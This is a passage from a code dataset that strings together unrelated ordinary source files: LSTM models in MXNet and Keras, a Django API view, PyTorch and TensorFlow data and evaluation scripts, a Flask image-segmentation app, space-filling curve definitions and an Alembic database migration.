param_cells=[]\n last_states=[]\n for i in range(num_lstm_layer):\n param_cells.append(LSTMParam(i2h_weight=mx.sym.Variable('l%d_i2h_weight'%i), \n i2h_bias = mx.sym.Variable('l%d_i2h_bias'%i),\n h2h_weight=mx.sym.Variable('l%d_h2h_weight'%i), \n h2h_bias = mx.sym.Variable('l%d_h2h_bias'%i)\n ))\n state=LSTMState(c=mx.sym.Variable('l%d_init_c'%i), h=mx.sym.Variable('l%d_init_h'%i))\n\n last_states.append(state)\n\n assert(len(last_states)==num_lstm_layer)\n\n loss_all=[]\n for seqidx in xrange(seq_len):\n data=mx.sym.Variable('data/%d'%seqidx)\n hidden=mx.sym.Embedding(data=data, weight=embed_weight, input_dim=input_size, output_dim=num_embed,name='t%d_embed'%(seqidx))\n \n #Deep LSTM\n for i in xrange(num_lstm_layer):\n if i==0:\n dp_ratio=0.\n else:\n dp_ratio=dropout\n next_state=lstm(num_hidden, indata=hidden, prev_state=last_states[i],param=param_cells[i],seqidx=seqidx, layeridx=i, dropout=dp_ratio)\n hidden=next_state.h\n last_states[i]=next_state\n\n if dropout:\n hidden=mx.sym.Dropout(data=hidden, p= dropout)\n fc=mx.sym.FullyConnected(data=hidden, weight=cls_weight, bias=cls_bias, num_hidden=num_label)\n mynumpysoftmax=NumpySoftmax()\n sm = mynumpysoftmax(data=fc, label=mx.sym.Variable('label/%d'%seqidx), name='t%d_sm'%seqidx)\n loss_all.append(sm)\n return mx.sym.Group(loss_all)\n\n\n\n\n\n\ndef lstm_inference_symbol(num_lstm_layer, input_size, num_hidden, num_embed, num_label, dropout=0.):\n \n seqidx=0\n \n embed_weight=mx.sym.Variable('embed_weight')\n cls_weight=mx.sym.Variable('cls_weight')\n cls_bias=mx.sym.Variable('cls_bias')\n\n param_cells=[]\n last_states=[]\n \n # Param init statement\n for i in range(num_lstm_layer):\n param_cells.append(LSTMParam(i2h_weight=mx.sym.Variable('l%d_i2h_weight'%i), \n i2h_bias = mx.sym.Variable('l%d_i2h_bias'%i),\n h2h_weight=mx.sym.Variable('l%d_h2h_weight'%i), \n h2h_bias = mx.sym.Variable('l%d_h2h_bias'%i)\n ))\n state=LSTMState(c=mx.sym.Variable('l%d_init_c'%i), h=mx.sym.Variable('l%d_init_h'%i))\n\n last_states.append(state)\n\n assert(len(last_states)==num_lstm_layer)\n\n\n data=mx.sym.Variable('data/%d' % seqidx)\n\n\n hidden=mx.sym.Embedding(data=data, weight=embed_weight, input_dim=input_size, output_dim=num_embed,name='t%d_embed'%(seqidx))\n \n #Deep LSTM\n for i in xrange(num_lstm_layer):\n if i==0:\n dp_ratio=0.\n else:\n dp_ratio=dropout\n next_state=lstm(num_hidden, indata=hidden, prev_state=last_states[i],param=param_cells[i],seqidx=seqidx, layeridx=i, dropout=dp_ratio)\n hidden=next_state.h\n last_states[i]=next_state\n\n if dropout:\n hidden=mx.sym.Dropout(data=hidden, p= dropout)\n fc=mx.sym.FullyConnected(data=hidden, weight=cls_weight, bias=cls_bias, num_hidden=num_label)\n sm = mx.sym.Custom(data=fc, label=mx.sym.Variable('label%d'%seqidx), name='t%d_sm'%seqidx, op_type='softmax')\n out=[sm]\n for state in last_states:\n out.append(state.c)\n out.append(state.h)\n return mx.sym.Group(out)\n\n\n\n\n\n\n\n\n\n\n \n","sub_path":"mylstm.py","file_name":"mylstm.py","file_ext":"py","file_size_in_byte":5322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"202217167","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom django.core import serializers\nfrom django.core.paginator import Paginator\nfrom api.users.serializers import UserSerializer\nfrom login.models import User\nfrom api import auth, views\nfrom edbw import settings\nimport libhttp\n\ndef users_callback(key, person, user_type, id_map={}):\n if 'page' in id_map:\n page = id_map['page']\n else:\n page = -1\n \n records = min(id_map['records'], settings.MAX_RECORDS_PER_PAGE)\n\n if 'id' in id_map:\n ids = id_map['id']\n \n rows = User.objects.filter(id__in=ids).values('json')\n else:\n rows = User.objects.all().values('json')\n \n paginator = Paginator(rows, records)\n \n if page > 0:\n return views.json_page_resp('persons', page, paginator) #JsonResponse({'page':page, 'pages':paginator.num_pages, 'persons':[x['json'] for x in page_rows]}, safe=False)\n else:\n return views.json_resp(paginator.get_page(1))\n\n\ndef users(request):\n id_map = libhttp.ArgParser() \\\n .add('key') \\\n .add('id', multiple=True) \\\n .add('page', arg_type=int) \\\n .add('records', default_value=settings.DEFAULT_RECORDS) \\\n .parse(request)\n \n return auth.auth(request, users_callback, id_map=id_map)\n","sub_path":"api/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"370852934","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport math, time\nimport datetime\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers.recurrent import LSTM\n\n# fixar random seed para se puder reproduzir os resultados\nfrom keras.optimizers import Nadam\nfrom sklearn.preprocessing import MinMaxScaler\n\nseed = 9\nnp.random.seed(seed)\n\n\n# Carregar os dados do .csv\ndef get_ad_data(normalized=0, file_name=None):\n activity = pd.read_csv(file_name, header=0)\n df = pd.DataFrame(activity) # Criar dataFrame\n # df.drop(df.columns[[0]], axis=1, inplace=True) # Largar coluna com data\n if normalized == 1:\n scaler = MinMaxScaler(feature_range=(0, 1))\n dataset = pd.DataFrame(scaler.fit_transform(df))\n return dataset\n return df\n\n\n# Comments Prof:\n# função load_data do lstm.py configurada para aceitar qualquer número de parametros\n# o último atributo é que fica como label (resultado)\n# stock é um dataframe do pandas (uma especie de dicionario + matriz)\n# seq_len é o tamanho da janela a ser utilizada na serie temporal\n#\n# Comments grupo:\n# Função alterada para o problema (separação esntre dados de treino e teste)\ndef load_data(df_dados, janela):\n qt_atributos = len(df_dados.columns)\n mat_dados = df_dados.values # converter dataframe para matriz (lista com lista de cada registo)\n tam_sequencia = janela + 1\n res = []\n for i in range(len(mat_dados) - janela): # numero de registos - tamanho da sequencia\n res.append(mat_dados[i: i + tam_sequencia])\n res = np.array(res) # dá como resultado um np com uma lista de matrizes (janela deslizante ao longo da serie)\n qt_casos_treino = 24 # dois anos de treino, um de teste\n train = res[:qt_casos_treino, :]\n x_train = train[:, :-1] # menos um registo pois o ultimo registo é o registo a seguir à janela\n y_train = train[:, -1][:, -1] # para ir buscar o último atributo para a lista dos labels\n x_test = res[qt_casos_treino:, :-1]\n y_test = res[qt_casos_treino:, -1][:, -1]\n x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], qt_atributos))\n x_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], qt_atributos))\n return [x_train, y_train, x_test, y_test]\n\n\n# imprime um grafico com os valores de teste e com as correspondentes tabela de previsões\ndef print_series_prediction(y_test, predic):\n diff = []\n racio = []\n for i in range(len(y_test)): # para imprimir tabela de previsoes\n racio.append((y_test[i] / predic[i]) - 1)\n diff.append(abs(y_test[i] - predic[i]))\n print('valor: %f ---> Previsão: %f Diff: %f Racio: %f' % (y_test[i], predic[i], diff[i], racio[i]))\n plt.plot(y_test, color='blue', label='y_test')\n plt.plot(predic, color='red', label='prediction') # este deu uma linha em branco\n plt.plot(diff, color='green', label='diff')\n plt.plot(racio, color='yellow', label='racio')\n plt.legend(loc='upper left')\n plt.show()\n\n\n# util para visualizar a topologia da rede num ficheiro em pdf ou png\ndef print_model(model, fich):\n from keras.utils import plot_model\n plot_model(model, to_file=fich, show_shapes=True, show_layer_names=True)\n\n\n\ndef build_model3(janela):\n model = Sequential()\n model.add(LSTM(30, input_shape=(janela, 14), return_sequences=True))\n model.add(Dropout(0.1))\n model.add(LSTM(20, input_shape=(janela, 14), return_sequences=True))\n model.add(Dropout(0.1))\n model.add(LSTM(10, input_shape=(janela, 14), return_sequences=False))\n model.add(Dropout(0.1))\n model.add(Dense(16, activation=\"relu\", kernel_initializer=\"normal\"))\n model.add(Dense(1, activation=\"linear\", kernel_initializer=\"normal\"))\n model.compile(loss='mse', optimizer='nadam', metrics=['mse', 'accuracy'])\n return model\n\n\n\ndef load_ad_dataset():\n #nornalizado\n return get_ad_data(1, 'adData.csv')\n\n\n\ndef print_history_accuracy(history):\n print(history.history.keys())\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('Model Accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n\ndef print_history_loss(history):\n print(history.history.keys())\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model Loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n\nif __name__ == '__main__':\n df = load_ad_dataset()\n print(\"df\", df.shape)\n janela = 2 # tamanho da Janela deslizante um ano\n X_train, y_train, X_test, y_test = load_data(df, janela)\n print(\"X_train\", X_train.shape)\n print(\"y_train\", y_train.shape)\n print(\"X_test\", X_test.shape)\n print(\"y_test\", y_test.shape)\n model = build_model3(janela)\n history = model.fit(X_train, y_train, batch_size=1, validation_data=(X_test, y_test), epochs=200, verbose=2,\n shuffle=False)\n print_history_loss(history)\n print_model(model, \"lstm_model.png\")\n trainScore = model.evaluate(X_train, y_train, verbose=0)\n testScore = model.evaluate(X_test, y_test, verbose=0)\n print(model.metrics_names)\n p = model.predict(X_test)\n predic = np.squeeze(\n np.asarray(p)) # para transformar uma matriz de uma coluna e n linhas em um np array de n elementos\n print_series_prediction(y_test, predic)\n print('Train Score: %.2f MSE (%.2f RMSE)' % (trainScore[0], math.sqrt(trainScore[0])))\n print('Test Score: %.2f MSE (%.2f RMSE)' % (testScore[0], math.sqrt(testScore[0])))\n","sub_path":"lstm/adData-LTSM.py","file_name":"adData-LTSM.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"172524644","text":"import torch\nfrom torch.utils.data import Dataset\nimport numpy as np\n\nfrom torch.utils.data import DataLoader\n\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\nclass myDataset(Dataset):\n def __init__(self, data_path, transcripts_path):\n self.data = np.load(data_path, encoding='bytes')\n self.flag = False\n if transcripts_path != None:\n self.label = np.load(transcripts_path)\n self.flag = True\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n sequence = self.data[index]\n sequence = torch.tensor(sequence)\n if self.flag is True:\n target = self.label[index]\n target = torch.tensor(target)\n return sequence, target\n else:\n return sequence, [-1]\n\ndef collate_seq(seq_list):\n inputs, targets = zip(*seq_list)\n lens = [len(seq) for seq in inputs]\n seq_order = sorted(range(len(lens)), key=lens.__getitem__, reverse=True)\n inputs = [inputs[i] for i in seq_order]\n targets = [targets[i] for i in seq_order]\n return inputs, targets\n\n\nif __name__ == '__main__':\n data_path = \"./data/dev.npy\"\n transcripts_path = \"./data/dev_char.npy\"\n train_set = myDataset(data_path, transcripts_path)\n # for i in range(3):\n # sequence, targets = train_set.__getitem__(i)\n # print(sequence.shape) # seq_len * 40\n train_loader = DataLoader(train_set, shuffle=False, batch_size=4, collate_fn=collate_seq, num_workers=4)\n for step, (inputs, targets) in enumerate(train_loader):\n if step == 0:\n print(inputs[0].shape, inputs[1].shape)\n print(targets)\n\n\n\n","sub_path":"myDataset.py","file_name":"myDataset.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"275977550","text":"from django.db import models\nclass Service(models.Model):\n title=models.CharField(max_length=200, verbose_name='titulo')\n subtitle=models.CharField(max_length=200, verbose_name='subtitulo')\n content=models.TextField(verbose_name='contenido')\n image=models.ImageField(upload_to='services', verbose_name='imagen')\n created=models.DateTimeField(auto_now_add=True, verbose_name='fecha de creación')\n updated=models.DateTimeField(auto_now=True, verbose_name='fecha de modificación')\n def __str__(self):\n return self.title\n class Meta:\n verbose_name='servicio'\n verbose_name_plural='servicios'\n ordering=['-created']\n# Create your models here.\n","sub_path":"webempresa/services/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"106850762","text":"import time\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nimport Fashion_mnist_inference\nimport Fashion_mnist_train\n\n# 验证阶段\ndef evaluate(fashion_mnist):\n with tf.Graph().as_default() as g:\n x = tf.placeholder(tf.float32, [fashion_mnist.validation.num_examples, Fashion_mnist_inference.IMAGE_SIZE,\n Fashion_mnist_inference.IMAGE_SIZE, Fashion_mnist_inference.NUM_CHANNELS],\n name='x-input')\n y_ = tf.placeholder(tf.float32, [None, Fashion_mnist_inference.OUT_NODE], name='y-input')\n xs = fashion_mnist.validation.images\n reshaped_xs = np.reshape(xs, (fashion_mnist.validation.num_examples, Fashion_mnist_inference.IMAGE_SIZE,\n Fashion_mnist_inference.IMAGE_SIZE, Fashion_mnist_inference.NUM_CHANNELS))\n validate_feed = {x: reshaped_xs, y_: fashion_mnist.validation.labels}\n y = Fashion_mnist_inference.inference(x, 0, None)\n\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n variable_averages = tf.train.ExponentialMovingAverage(Fashion_mnist_train.MOVING_AVERAGE_DECAY)\n variables_to_restore = variable_averages.variables_to_restore()\n saver = tf.train.Saver(variables_to_restore)\n # 读取最后一次保存的权重文件来验证网络模型的分类性能\n with tf.Session() as sess:\n ckpt = tf.train.get_checkpoint_state(Fashion_mnist_train.MODEL_SAVE_PATH)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n global_step = ckpt.model_checkpoint_path.split('\\\\')[-1].split('-')[-1]\n accuracy_score = sess.run(accuracy, feed_dict=validate_feed)\n print(\"After %s training step(s), validation \"\n \"accuracy = %g\" % (global_step, accuracy_score))\n else:\n print('No checkpoint file found')\n return\n\n\ndef main(argv=None):\n fashion_mnist = input_data.read_data_sets(r\"Fashion-mnist-data\", one_hot=True)\n evaluate(fashion_mnist)\n\n\nif __name__ == '__main__':\n tf.app.run()","sub_path":"Fashion-mnist/Fashion_mnist_val.py","file_name":"Fashion_mnist_val.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"466845915","text":"import random\nimport string\n\nfrom os.path import split\nfrom flask import send_from_directory, send_file, request, json, after_this_request\nfrom app import app\nfrom app.process.segnet.segment import img_process\nfrom app.tools.dirs import save_upload, save_processed, get_original, get_segmented, save_processed_outlined, \\\n save_upload_outlined, create_zip, cleanup, allowed_file\nfrom app.process.outline import *\nfrom app.process.base64conversion import *\nfrom PIL import Image\n\n\n@app.route('/')\n@app.route('/home')\ndef index():\n return send_file('../dist/web/index.html', 'text/html')\n\n\n# delete img after processing\n@app.route('/segment', methods=['POST'])\ndef upload_file():\n b64_string = request.form['image']\n original_filename = request.form['fileName']\n\n serial_id = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))\n filename = serial_id + '.png'\n image = from_base64(b64_string)\n\n if allowed_file(original_filename):\n file_info = save_upload(image, filename)\n img_data = img_process(file_info[0])\n pro_img = save_processed(img_data, file_info[1])\n imgOriginal = get_original(serial_id)\n\n processed_base64 = to_base64(pro_img)\n original_base64 = to_base64(imgOriginal)\n return json.jsonify(segmentedImage=get_html(processed_base64), serialID=serial_id, originalImage=get_html(original_base64))\n else:\n return 'Incompatible File'\n\n\n@app.route('/outline', methods=['POST'])\ndef select_segment():\n seg_rgb = request.form['segmentColor']\n outline_color = request.form['outlineColor']\n outline_thickness = request.form['outlineThickness']\n outline_thickness_int = int(outline_thickness)\n serial_id = request.form['serialID']\n\n seg_image_path = get_segmented(serial_id)\n orig_image_path = get_original(serial_id)\n seg_img = Image.open(seg_image_path)\n img_outline = get_outline(seg_img, seg_rgb)\n orig_image = Image.open(orig_image_path)\n orig_image = paste_outline(orig_image, img_outline, outline_color, outline_thickness_int)\n seg_img = paste_outline(seg_img, img_outline, outline_color, outline_thickness_int)\n\n orig_f = split(orig_image_path)[1]\n outline_orig_img_path = save_upload_outlined(orig_f, orig_image)\n\n seg_f = split(seg_image_path)[1]\n outline_seg_img_path = save_processed_outlined(seg_f, seg_img)\n\n seg_img = get_html(to_base64(outline_seg_img_path))\n orig_image = get_html(to_base64(outline_orig_img_path))\n\n return json.jsonify(originalOutline=orig_image, segmentedOutline=seg_img)\n\n\n@app.route('/download', methods=['POST'])\ndef download():\n serial_id = request.form['serialID']\n orig = request.form['orig']\n orig_outline = request.form['origOutline']\n seg = request.form['seg']\n seg_outline = request.form['segOutline']\n\n zip_path = create_zip(serial_id, [orig, orig_outline, seg, seg_outline])\n\n @after_this_request\n def removal(response):\n cleanup(serial_id)\n return response\n\n return send_file(zip_path, attachment_filename=serial_id + '.zip')\n\n@app.route('/help', methods=['GET'])\ndef user_guide():\n return send_file('help.pdf' , as_attachment=True)\n\n@app.route('/')\ndef send_js(path):\n return send_from_directory('../dist/web', path)\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"313606295","text":"from peano.curves import Curve\nfrom peano.base_maps import BaseMap\n\n\n#\n# 2D curves\n#\n\ndef get_hilbert_curve():\n \"\"\"\n Example of fractal curve due to D.Hilbert.\n\n This curve has minimal known L_1 ratio (9).\n \"\"\"\n pattern = ('jiJ', ['ji','ij','ij','JI']) # chain code + bases\n return Curve.parse([pattern])\n\n\ndef get_peano_curve():\n \"\"\"First example of space-filling curve due to G.Peano.\"\"\"\n chain = 'jji' + 'JJi' + 'jj'\n bases = ['ij','Ij','ij', 'iJ','IJ','iJ', 'ij','Ij','ij']\n pattern = (chain, bases)\n return Curve.parse([pattern])\n\n\ndef get_scepin_bauman_curve():\n \"\"\"\n Minimal 3*3 Peano Curve by E.V. Shchepin and K.E. Bauman.\n\n Proceedings of the Steklov Institute of Mathematics, 2008, Vol. 263, pp. 236--256.\n \"\"\"\n proto = ( # as in peano curve\n (0, 0), (0, 1), (0, 2),\n (1, 2), (1, 1), (1, 0),\n (2, 0), (2, 1), (2, 2),\n )\n base_maps = [\n BaseMap.id_map(dim=2),\n BaseMap.parse('jI'),\n BaseMap.parse('ji'),\n\n BaseMap.parse('iJ'),\n BaseMap.parse('JI'),\n BaseMap.parse('Ji'),\n\n BaseMap.id_map(dim=2),\n BaseMap.parse('jI'),\n BaseMap.parse('ji'),\n ]\n return Curve(dim=2, div=3, patterns=[(proto, base_maps)])\n\n\ndef get_peano5_curve():\n \"\"\"5-div analog of original Peano curve.\"\"\"\n id_map = BaseMap.id_map(2)\n x_map = BaseMap.parse('Ij')\n y_map = BaseMap.parse('iJ')\n xy_map = BaseMap.parse('IJ')\n proto = [\n (0, 0), (0, 1), (0, 2), (0, 3), (0, 4),\n (1, 4), (1, 3), (1, 2), (1, 1), (1, 0),\n (2, 0), (2, 1), (2, 2), (2, 3), (2, 4),\n (3, 4), (3, 3), (3, 2), (3, 1), (3, 0),\n (4, 0), (4, 1), (4, 2), (4, 3), (4, 4),\n ]\n base_maps = [\n id_map, x_map, id_map, x_map, id_map,\n y_map, xy_map, y_map, xy_map, y_map,\n id_map, x_map, id_map, x_map, id_map,\n y_map, xy_map, y_map, xy_map, y_map,\n id_map, x_map, id_map, x_map, id_map,\n ]\n return Curve(dim=2, div=5, patterns=[(proto, base_maps)])\n\n\ndef get_meurthe_curve():\n \"\"\"Meurthe curve, equivalent to Schepin-Bauman curve.\"\"\"\n pattern = ('jjiJJijj', ['ji','jI','ij','Ji','JI','iJ','ji','jI','ij'])\n return Curve.parse([pattern])\n\n \ndef get_coil_curve():\n \"\"\"Coil 2D 3-div curve, see Haverkort & Walderveen.\"\"\"\n pattern = ('jjiJJijj', ['ji','jI','ji','Ji','JI','Ji','ji','jI','ji'])\n return Curve.parse([pattern])\n\n\ndef get_serpentine_curve():\n \"\"\"Serpentine 2D 3-div curve, see Haverkort & Walderveen.\"\"\"\n pattern = ('jjiJJijj', ['ij','jI','ji','iJ','JI','iJ','ji','jI','ij'])\n return Curve.parse([pattern])\n\n\ndef get_r_curve():\n \"\"\"R-curve, 2D 3-div, see Haverkort & Walderveen.\"\"\"\n pattern = ('jjiiJIJi', ['ji','ji','ij','ij','ij','IJ','JI','JI','ij'])\n return Curve.parse([pattern])\n\n\ndef get_ye_curve():\n \"\"\"YE-curve: 5*5 monofractal with l2-ratio 5 43/73.\"\"\"\n chain = 'jiJijjIIjjiJijiiJIJiJIJi'\n bases = '0Ji~,0ij,0ij,0jI~,0Ji~,0Ji~,0Ji~,0IJ,0IJ,0Ji~,0ij,0ij,0jI~,0Ji~,0ij,0ij,0ij,0IJ,0jI~,0jI~,0ij,0IJ,0jI~,0jI~,0ij'\n return Curve.parse([(chain, bases)])\n\n\n# 2D polyfractals\n\ndef get_beta_omega_curve():\n \"\"\"\n Beta-Omega bifractal 2d curve, best polyfractal in l2\n\n See J.-M. Wierum, ``Definition of a New Circular Space-Filling Curve'',\n Technical report PC^2, 2002\n\n Realization from Haverkort & Walderveen,\n ``Locality and bounding-box quality of two-dimensional space-filling curves'',\n Comp.Geom and Appl, v.43 (2010)\n\n ratio: l2=5, l1=9, linf=5\n gates: omega: (0,1/3)->(1,1/3), beta: (0,1/3)->(2/3,0)\n \"\"\"\n omega_pattern = ('jiJ', ['1iJ','1jI','1ji~','1IJ~'])\n beta_pattern = ('jiJ', ['1iJ','1jI','1ji~','0Ji'])\n return Curve.parse([omega_pattern, beta_pattern])\n\n\ndef get_ARW_Curve():\n \"\"\"\n AR^2W^2 tetrafractal curve.\n\n See reference to Haverkort & Walderveen in get_beta_omega_curve doc\n \"\"\"\n r_pattern = ('i(Ij)i', ['3ij','1Ji~','2jI','1iJ']) # pnum=0\n f_pattern = ('jiJ', ['3ji','2Ij~','1ij','1JI']) # pnum=1\n p_pattern = ('jiJ', ['0ji','1jI','0Ji','1JI']) # pnum=2\n g_pattern = ('jiJ', ['0ij','2jI','0Ji','3jI~']) # pnum=3\n return Curve.parse([r_pattern, f_pattern, p_pattern, g_pattern])\n\n\n#\n# 3D curves\n#\n\ndef get_haverkort_curve_a26():\n \"\"\"\n 3D Haverkort A26 curve, best monofractal in linf.\n\n Monofractal curve with time reversal.\n \"An inventory of three-dimensional Hilbert space-filling curves\", Herman Haverkort\n https://arxiv.org/abs/1109.2323\n Curve A26.0010 1011.1011 0011, see p.10, p.15, p.18\n\n Properties:\n ratio: linf=12.4\n gate: (0,0,0)->(1,0,0)\n \"\"\"\n pattern = ('jkJijKJ', ['Jki~', 'Kij~', 'kij', 'IKJ~', 'iKJ', 'kIj~', 'KIj', 'JIk'])\n return Curve.parse([pattern])\n\n\ndef get_haverkort_curve_f():\n \"\"\"\n 3D Haverkort F curve, best known monofractal in l2\n\n Monofractal curve with time reversal,\n \"An inventory of three-dimensional Hilbert space-filling curves\", Herman Haverkort\n https://arxiv.org/abs/1109.2323\n Curve F, see p.13, p.15, p.18\n\n Properties:\n ratio: l1=89.8, l2=18.6 (best known!)\n gate: (0,1/3,1/3)->(2/3,1/3,0)\n \"\"\"\n pattern = ('jkJijKJ', ['iKJ','jIK','jIk~','JkI','Jki~','jik','jiK~','kiJ~'])\n return Curve.parse([pattern])\n\n\ndef get_tokarev_curve():\n \"\"\"\n 3D monofractal curve defined by Tokarev.\n\n Definition is taken from Haverkort's inventory,\n Curve A26.0000 0000.0000 0000 (page 9, Fig.5(b))\n \"\"\"\n p0 = ('jkJijKJ', ['jki','kij','kij','iJK','iJK','KIj','KIj','JkI'])\n return Curve.parse([p0])\n\n\n# 3D polyfractals\n\ndef get_neptunus_curve():\n \"\"\"\n 3D bifractal Neptunus curve, best in linf (9.45)\n\n \"An inventory of three-dimensional Hilbert space-filling curves\", Herman Haverkort\n https://arxiv.org/abs/1109.2323\n p.16\n\n Properties:\n ratio: linf=9.45, best in class of poly-Hilbert curves\n gates: (0,0,0)->(1,0,0), (0,0,0)->(1,1,1)\n \"\"\"\n p0 = ('jkJijKJ', ['1ijk','0jIK','1kJI','1JiK','1ijk','1jKI','1KJi','0JIk'])\n p1 = ('jkJiKjk', ['1ijk','0jIK','1kJI','1JiK','0ijk','1KjI','1jki','0kIJ'])\n return Curve.parse([p0, p1])\n\n\ndef get_luna_curve():\n \"\"\"\n 3D bifractal Luna curve\n\n Inventory ref, p.16\n\n gates: (0,0,0)->(1,0,0), (0,0,0)->(1,1,1)\n \"\"\"\n p0 = ('jkJijKJ', ['1kji','0jIK','1JIk','1iKJ','1ijk','1jKI','0JiK','1KiJ'])\n p1 = ('jkJiKjk', ['1kji','0jIK','1JIk','1iKJ','0ijk','1KjI','0kij','1jik'])\n return Curve.parse([p0, p1])\n\n\ndef get_17_curve():\n \"\"\"\n 3D bifractal facet-gated curve with l2-ratio <17\n \"\"\"\n p0 = ('jikIJiK', '1KIJ~,0KIj,1kji,0Jki~,1JkI,0kIJ,1KJi,1JiK')\n p1 = ('jkJijKJ', '1KIJ~,0ijK~,0Ikj~,0KJI~,0kiJ~,0Ijk~,0IjK,1iKJ')\n return Curve.parse([p0, p1])\n","sub_path":"tests/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":6723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"502364006","text":"\"\"\"edit\n\nRevision ID: 1d734133b89b\nRevises: 2e1bc726e847\nCreate Date: 2015-06-06 16:58:17.129689\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1d734133b89b'\ndown_revision = '2e1bc726e847'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('question_comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('body', sa.Text(), nullable=True),\n sa.Column('body_html', sa.Text(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('is_active', sa.Boolean(), nullable=True),\n sa.Column('likes', sa.Integer(), nullable=True),\n sa.Column('question_id', sa.Integer(), nullable=True),\n sa.Column('author_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),\n sa.ForeignKeyConstraint(['question_id'], ['questions.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_question_comments_timestamp'), 'question_comments', ['timestamp'], unique=False)\n op.create_table('answer_comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('body', sa.Text(), nullable=True),\n sa.Column('body_html', sa.Text(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('is_active', sa.Boolean(), nullable=True),\n sa.Column('likes', sa.Integer(), nullable=True),\n sa.Column('answer_id', sa.Integer(), nullable=True),\n sa.Column('author_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['answer_id'], ['answers.id'], ),\n sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_answer_comments_timestamp'), 'answer_comments', ['timestamp'], unique=False)\n op.drop_table('comments')\n op.create_foreign_key(None, 'answers', 'users', ['author_id'], ['id'])\n op.create_foreign_key(None, 'answers', 'questions', ['question_id'], ['id'])\n op.create_foreign_key(None, 'follows', 'users', ['follower_id'], ['id'])\n op.create_foreign_key(None, 'follows', 'users', ['followed_id'], ['id'])\n op.create_foreign_key(None, 'questions', 'users', ['author_id'], ['id'])\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'questions', type_='foreignkey')\n op.drop_constraint(None, 'follows', type_='foreignkey')\n op.drop_constraint(None, 'follows', type_='foreignkey')\n op.drop_constraint(None, 'answers', type_='foreignkey')\n op.drop_constraint(None, 'answers', type_='foreignkey')\n op.create_table('comments',\n sa.Column('id', mysql.INTEGER(display_width=11), nullable=False),\n sa.Column('body', mysql.TEXT(), nullable=True),\n sa.Column('body_html', mysql.TEXT(), nullable=True),\n sa.Column('timestamp', mysql.DATETIME(), nullable=True),\n sa.Column('is_active', mysql.TINYINT(display_width=1), autoincrement=False, nullable=True),\n sa.Column('likes', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('author_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('answer_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('question_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('id'),\n mysql_default_charset=u'latin1',\n mysql_engine=u'MyISAM'\n )\n op.drop_index(op.f('ix_answer_comments_timestamp'), table_name='answer_comments')\n op.drop_table('answer_comments')\n op.drop_index(op.f('ix_question_comments_timestamp'), table_name='question_comments')\n op.drop_table('question_comments')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/1d734133b89b_edit.py","file_name":"1d734133b89b_edit.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"577255328","text":"from django import template\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core import 